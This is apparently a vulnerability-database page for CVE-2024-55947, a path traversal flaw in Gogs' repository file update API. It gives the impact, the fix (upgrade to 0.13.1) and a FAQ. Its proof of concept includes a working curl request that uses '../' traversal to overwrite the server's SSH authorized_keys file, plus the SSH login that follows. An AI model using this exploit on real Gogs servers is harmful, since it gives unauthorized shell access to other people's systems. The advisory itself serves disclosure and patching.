high
8.8
CWE
22
Advisory Published
Advisory Published
Updated

CVE-2024-55947: Gogs has a Path Traversal in file update API

First published: Mon Dec 23 2024(Updated: )

### Impact The malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. ### Patches Writing files outside repository Git directory has been prohibited via the repository file update API (https://github.com/gogs/gogs/pull/7859). Users should upgrade to 0.13.1 or the latest 0.14.0+dev. ### Workarounds No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions. ### References n/a ### Proof of Concept 1. Generate a Personal Access Tokens 2. Edit any file on the server with this ```bash curl -v --path-as-is -X PUT --url "http://localhost:10880/api/v1/repos/Test/bbcc/contents/../../../../../../../../home/git/.ssh/authorized_keys" \ -H "Authorization: token eaac23cf58fc76bbaecd686ec52cd44d903db9bf" \ -H "Content-Type: application/json" \ --data '{ "message": "an", "content": "<base64encoded: your ssh pub key>" }' ``` 3. ssh connect to remote server ```bash ssh -i temp git@localhost -p 10022 ``` ### For more information If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
go/gogs.io/gogs<0.13.1
0.13.1
Gogs<0.13.1

Remedy

https://github.com/gogs/gogs/commit/9a9388ace25bd646f5098cb9193d983332c34e41

Remedy

https://github.com/gogs/gogs/pull/7859

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2024-55947?

    CVE-2024-55947 has a high severity rating due to its ability to allow malicious users to write files to arbitrary paths, potentially compromising the server.

  • How do I fix CVE-2024-55947?

    To mitigate CVE-2024-55947, upgrade to Gogs version 0.13.1 or later, which prohibits writing files outside the repository Git directory.

  • What systems are affected by CVE-2024-55947?

    CVE-2024-55947 affects Gogs versions prior to 0.13.1, allowing unauthorized file writes.

  • What is the primary impact of CVE-2024-55947?

    The primary impact of CVE-2024-55947 is the potential for a malicious user to gain SSH access to the server.

  • Is CVE-2024-55947 being actively exploited?

    There is no current public evidence indicating that CVE-2024-55947 is actively being exploited, but it remains a high-risk vulnerability.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203